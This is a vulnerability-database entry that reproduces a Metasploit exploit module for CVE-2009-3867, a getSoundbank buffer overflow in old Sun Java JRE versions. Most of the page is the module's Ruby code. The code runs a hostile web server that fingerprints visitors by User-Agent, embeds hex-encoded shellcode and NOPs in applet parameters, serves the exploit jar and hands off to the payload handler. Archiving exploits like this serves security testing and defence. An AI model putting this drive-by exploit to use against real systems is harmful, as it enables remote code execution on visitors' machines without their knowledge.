Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Sun Java JRE - getSoundbank 'file://' URI Buffer Overflow (Metasploit)

🗓️ 20 Sep 2010 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 45 Views

Sun Java JRE getSoundbank URI Buffer Overflow exploi

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2009-3867
29 Oct 200900:00
circl
Check Point Advisories		Sun Java HsbParser.getSoundBank Stack Buffer Overflow (CVE-2009-3867)
2 Feb 201000:00
checkpoint_advisories
CVE		CVE-2009-3867
5 Nov 200916:00
cve
Cvelist		CVE-2009-3867
5 Nov 200916:00
cvelist
Tenable Nessus		GLSA-200911-02 : Sun JDK/JRE: Multiple vulnerabilities
18 Nov 200900:00
nessus
Tenable Nessus		Mac OS X : Java for Mac OS X 10.5 Update 6
4 Dec 200900:00
nessus
Tenable Nessus		Mac OS X : Java for Mac OS X 10.6 Update 1
4 Dec 200900:00
nessus
Tenable Nessus		RHEL 4 / 5 : java-1.6.0-sun (RHSA-2009:1560)
10 Nov 200900:00
nessus
Tenable Nessus		RHEL 4 / 5 : java-1.5.0-sun (RHSA-2009:1571)
11 Nov 200900:00
nessus
Tenable Nessus		RHEL 3 / 4 / 5 : java-1.4.2-ibm (RHSA-2009:1643)
8 Dec 200900:00
nessus
Rows per page
##
# $Id: java_getsoundbank_bof.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	#
	# This module acts as an HTTP server
	#
	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Sun Java JRE getSoundbank file:// URI Buffer Overflow',
			'Description'    => %q{
				This module exploits a flaw in the getSoundbank function in the Sun JVM.

				The payload is serialized and passed to the applet via PARAM tags. It must be
				a native payload.

				The effected Java versions are JDK and JRE 6 Update 16 and earlier,
				JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and
				earlier, and SDK and JRE 1.3.1_26 and earlier.

				NOTE: Although all of the above versions are reportedly vulnerable, only
				1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'kf',      # Original PoC/exploit
					'jduck'    # metasploit version
				],
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					[ 'CVE', '2009-3867' ],
					[ 'OSVDB', '59711' ],
					[ 'BID', '36881' ],
					[ 'URL', 'http://zerodayinitiative.com/advisories/ZDI-09-076/' ]
				],
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => '',
					'DisableNops' => true,
				},
			'Targets'        =>
				[
=begin

No automatic targetting for now ...

					[ 'J2SE 1.6_16 Automatic',
						{
							'Platform' => ['win', 'linux', 'osx'],
							'Arch' => [ARCH_X86, ARCH_PPC]
						}
					],
=end
					[ 'J2SE 1.6_16 on Windows x86',
						{
							'Platform' => 'win',
							'Arch' => ARCH_X86
						}
					],
					[ 'J2SE 1.6_16 on Mac OS X PPC',
						{
							'Platform' => 'osx',
							'Arch' => ARCH_PPC,
						}
					],
					[ 'J2SE 1.6_16 on Mac OS X x86',
						{
							'Platform' => 'osx',
							'Arch' => ARCH_X86,
						}
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Nov 04 2009'
			))
	end


	def exploit
		# load the static jar
		path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2009-3867.jar")
		fd = File.open(path, "rb")
		@jar_data = fd.read(fd.stat.size)
		fd.close

		super
	end


	def on_request_uri(cli, req)

		# Create a cached mapping between IP and detected target
		@targetcache ||= {}
		@targetcache[cli.peerhost] ||= {}
		@targetcache[cli.peerhost][:update] = Time.now.to_i

		if (target.name =~ /Automatic/)
			case req.headers['User-Agent']
			when /Windows/i
				print_status("Choosing a Windows target for #{cli.peerhost}:#{cli.peerport}...")
				@targetcache[cli.peerhost][:target] = self.targets[1]
			when /PPC Mac OS X/i
				print_status("Choosing a Mac OS X PPC target for #{cli.peerhost}:#{cli.peerport}...")
				@targetcache[cli.peerhost][:target] = self.targets[2]
			when /Intel Mac OS X/i
				print_status("Choosing a Mac OS X x86 target for #{cli.peerhost}:#{cli.peerport}...")
				@targetcache[cli.peerhost][:target] = self.targets[3]
			else
				print_status("Unknown target for: #{req.headers['User-Agent']}")
			end
		end

		# Clean the cache
		rmq = []
		@targetcache.each_key do |addr|
			if (Time.now.to_i > @targetcache[addr][:update]+60)
				rmq.push addr
			end
		end

		rmq.each {|addr| @targetcache.delete(addr) }


		# Request processing
		if (not req.uri.match(/\.jar$/i))

			# Redirect to the base directory so the applet code loads...
			if (not req.uri.match(/\/$/))
				print_status("Sending redirect so path ends with / ...")
				send_redirect(cli, get_resource() + '/', '')
				return
			end

			# Display the applet loading HTML
			print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...")
			send_response_html(cli, generate_html(payload.encoded),
				{
					'Content-Type' => 'text/html',
					'Pragma' => 'no-cache'
				})
			return
		end

		# Send the actual applet over
		print_status("Sending applet to #{cli.peerhost}:#{cli.peerport}...")
		send_response(cli, generate_applet(cli, req),
			{
				'Content-Type' => 'application/octet-stream',
				'Pragma' => 'no-cache'
			})

		# Handle the payload
		handler(cli)
	end


	def generate_html(pl)

		html = <<-EOF
<html>
<head>
<!-- <meta http-equiv=refresh content=10 /> -->
</head>
<body>
<applet width='100%' height='100%' code='AppletX' archive='JARNAME'>
<param name='sc' value='SCODE' />
<param name='np' value='NOPS' />
</applet>
</body>
</html>
EOF

		# finalize the html
		jar_name = rand_text_alphanumeric(32)
		html.gsub!(/JARNAME/, jar_name)

		# add payload
		debug_payload = false
		pload = ""
		pload << "\xcc" if debug_payload
		pload << pl
		if ((pload.length % 4) > 0)
			pload << rand_text((4 - (pload.length % 4)))
		end
		if debug_payload
			print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload))
		end
		html.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))

		# add nops
		nops = "\x90\x90\x90\x90"
		html.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))
		#print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops))

		return html

	end


	def generate_applet(cli, req)

		this_target = nil
		if (target.name =~ /Automatic/)
			if (@targetcache[cli.peerhost][:target])
				this_target = @targetcache[cli.peerhost][:target]
			else
				return ''
			end
		else
			this_target = target
		end

		return @jar_data
	end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Sep 2010 00:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 29.3
EPSS0.89244
metasploitbuffer overflowsun java jre
45